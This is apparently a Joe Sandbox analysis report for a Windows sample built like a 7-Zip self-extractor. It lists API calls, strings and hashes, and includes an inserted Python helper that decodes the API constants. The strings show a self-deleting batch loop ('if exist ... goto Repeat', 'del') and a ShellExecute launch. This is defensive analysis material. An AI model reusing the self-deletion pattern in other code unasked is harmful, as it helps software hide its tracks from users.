• DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
• FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
• FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
• RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 1862581289-0
• Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
• Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
• Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
• Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C

APIs
• LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
• GetWindow.USER32(?,00000005), ref: 00406D8F
• GetWindow.USER32(00000000,00000002), ref: 00406DA5
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: Window$AddressLibraryLoadProc
• String ID: SetWindowTheme$\EA$uxtheme
• API String ID: 324724604-1613512829
• Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
• Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
• Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
• Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC

Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
• Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
• Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
• Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84

Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
• Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
• Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
• Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0

Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
• Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
• Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
• Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                                                                                                                                                                • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
APIs
• GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
• WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
• CloseHandle.KERNEL32(004177C4), ref: 00404C40
• SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
• ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
• ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
Strings
Similarity
• API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
• String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
• API String ID: 3007203151-3467708659
APIs
• lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
• _wtol.MSVCRT ref: 004047DC
• _wtol.MSVCRT ref: 004047F8
Strings
Similarity
• API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
• String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
• API String ID: 2725485552-3187639848
APIs
• GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
• lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
• GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
  • Part of subcall function 00401A85: CharUpperW.USER32(?,7591E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
• GetParent.USER32(?), ref: 00402E2E
• LoadLibraryA.KERNEL32(riched20), ref: 00402E42
• GetMenu.USER32(?), ref: 00402E55
• SetThreadLocale.KERNEL32(00000419), ref: 00402E62
• CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
• DestroyWindow.USER32(?), ref: 00402EA3
• SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
• GetSysColor.USER32(0000000F), ref: 00402EBC
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
• SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                                                                                                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                                                                                                                                • API String ID: 1731037045-2281146334
                                                                                                                                                                                                                                                • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                                                                                                                                                                • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
APIs
• GetWindowDC.USER32(00000000), ref: 00401CD4
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
• MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
• GetObjectW.GDI32(?,00000018,?), ref: 00401D28
• MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
• MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
• CreateCompatibleDC.GDI32(?), ref: 00401D4B
• CreateCompatibleDC.GDI32(?), ref: 00401D52
• SelectObject.GDI32(00000000,?), ref: 00401D60
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
• SelectObject.GDI32(00000000,00000000), ref: 00401D76
• SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
• GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
• SelectObject.GDI32(00000000,?), ref: 00401DB3
• SelectObject.GDI32(00000000,?), ref: 00401DB9
• DeleteDC.GDI32(00000000), ref: 00401DC2
• DeleteDC.GDI32(00000000), ref: 00401DC5
• ReleaseDC.USER32(00000000,?), ref: 00401DCC
• ReleaseDC.USER32(00000000,?), ref: 00401DDB
• CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
• String ID:
• API String ID: 3462224810-0
• Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
• Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
• Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
• Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
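The API listings on this page are raw magic numbers, which is what makes reading them slow. The Python below is an added triage helper written for this page; it is not Joe Sandbox code and not code from the analysed sample. It parses lines in the report's "• Api.MODULE(args), ref: addr" format (a handful of lines copied from the RichEdit, bitmap-scaling and picture-loading listings on this page serve as a constructed sample) and resolves the constants to their Windows SDK names: LOGPIXELSX, HALFTONE and SRCCOPY in the DPI-aware StretchBlt routine, STM_SETIMAGE for the static-control image load, the EM_* messages sent to the RichEdit control, and LCID 0x0419 (ru-RU) passed to SetThreadLocale, which is the one value here an analyst would want to notice. The constant values are from the SDK headers; the parsing rules (an 8-hex-digit token is an immediate, `?` is an argument the sandbox could not resolve) are my assumptions about the report format.

```python
import re
from typing import Optional

# Constructed sample: lines copied from the "APIs" listings of this report
# (Joe Sandbox format: "• Api.MODULE(args), ref: address"; "?" marks an
# argument the static analysis could not resolve).
SAMPLE = """
• SetThreadLocale.KERNEL32(00000419), ref: 00402E62
• CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
• SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
• GetSysColor.USER32(0000000F), ref: 00402EBC
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
• SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
• SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
"""

# Assumed line shape of the report; the "Part of subcall function" prefix
# marks calls made by a callee rather than by the listed function itself.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<subfn>[0-9A-F]+):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")

# Values from the Windows SDK headers (winuser.h, wingdi.h, richedit.h, winnt.h).
KNOWN = {  # (api, argument index) -> {value: symbolic name}
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX"},
    ("SetStretchBltMode", 1): {4: "HALFTONE"},
    ("StretchBlt", 10): {0x00CC0020: "SRCCOPY"},
    ("GetCurrentObject", 1): {7: "OBJ_BITMAP"},
    ("GetSysColor", 0): {15: "COLOR_BTNFACE"},
    ("SetWindowPos", 6): {6: "SWP_NOMOVE|SWP_NOZORDER"},
    ("FindResourceExA", 3): {0x409: "LANG 0x0409 (en-US)"},
    ("GlobalAlloc", 0): {0x40: "GMEM_ZEROINIT"},
}
MESSAGES = {0x172: "STM_SETIMAGE", 0x443: "EM_SETBKGNDCOLOR",
            0x459: "EM_SETTEXTMODE", 0x461: "EM_SETTEXTEX"}
LCIDS = {0x409: "en-US", 0x419: "ru-RU"}
# Window styles; the ES_ bits only carry this meaning for edit/RichEdit classes.
WS_FLAGS = [(0x40000000, "WS_CHILD"), (0x10000000, "WS_VISIBLE"),
            (0x800, "ES_READONLY"), (0x4, "ES_MULTILINE")]


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None            # unresolved by the sandbox
    if HEX8.match(tok):
        return int(tok, 16)    # immediate / pointer value
    return tok                 # resolved string literal, e.g. RichEdit20W


def parse_calls(text: str) -> list:
    """Turn the listing into dicts: api, module, args, ref, subcall_of."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall_of": m["subfn"]})
    return calls


def annotate(call: dict) -> list:
    """Resolve the magic numbers in one call to SDK symbol names."""
    api, args = call["api"], call["args"]
    notes = []
    for (name, idx), table in KNOWN.items():
        if name == api and idx < len(args) and args[idx] in table:
            notes.append(f"arg{idx}={table[args[idx]]}")
    if api.startswith("SendMessage") and len(args) > 1 and args[1] in MESSAGES:
        notes.append(f"msg={MESSAGES[args[1]]}")
    if api == "SetThreadLocale" and args and args[0] in LCIDS:
        notes.append(f"lcid={LCIDS[args[0]]}")
    if (api.startswith("CreateWindowEx") and len(args) > 3
            and isinstance(args[1], str) and "Edit" in args[1]
            and isinstance(args[3], int)):
        notes.append("style=" + "|".join(n for bit, n in WS_FLAGS if args[3] & bit))
    return notes


def thread_locale(calls: list) -> Optional[str]:
    """Locale the module forces on its thread, or None if it never does."""
    for c in calls:
        if c["api"] == "SetThreadLocale" and c["args"] and isinstance(c["args"][0], int):
            return LCIDS.get(c["args"][0], f"0x{c['args'][0]:04X}")
    return None


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for c in parsed:
        tag = f" (in sub_{c['subcall_of']})" if c["subcall_of"] else ""
        print(f"{c['ref']:08X} {c['api']}{tag}: {', '.join(annotate(c)) or '-'}")
    print("thread locale:", thread_locale(parsed))
```

Running it prints one annotated line per call and finishes with `thread locale: ru-RU`. Extending `KNOWN` and `MESSAGES` with the constants for the remaining calls in the report (GetWindowLongW, SetWindowPos, GlobalAlloc) is the obvious next step; feed it the full "APIs" text of a function block rather than the sample.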
APIs
• GetClassNameA.USER32(?,?,00000040), ref: 00401E05
• lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
• GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
• GetMenu.USER32(?), ref: 00401E44
  • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
  • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
  • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
  • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
• GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
• memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
• CoInitialize.OLE32(00000000), ref: 00401E8C
• CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
• GlobalFree.KERNEL32(00000000), ref: 00401ECD
  • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
  • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
  • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
  • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
  • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
  • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
  • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
  • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
  • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
• GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
• SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
• SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
• GlobalFree.KERNEL32(00000000), ref: 00401F3A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                                                                                                                                                • String ID: IMAGES$STATIC
                                                                                                                                                                                                                                                • API String ID: 4202116410-1168396491
                                                                                                                                                                                                                                                • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                                                                                                                                                                • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040821D
                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
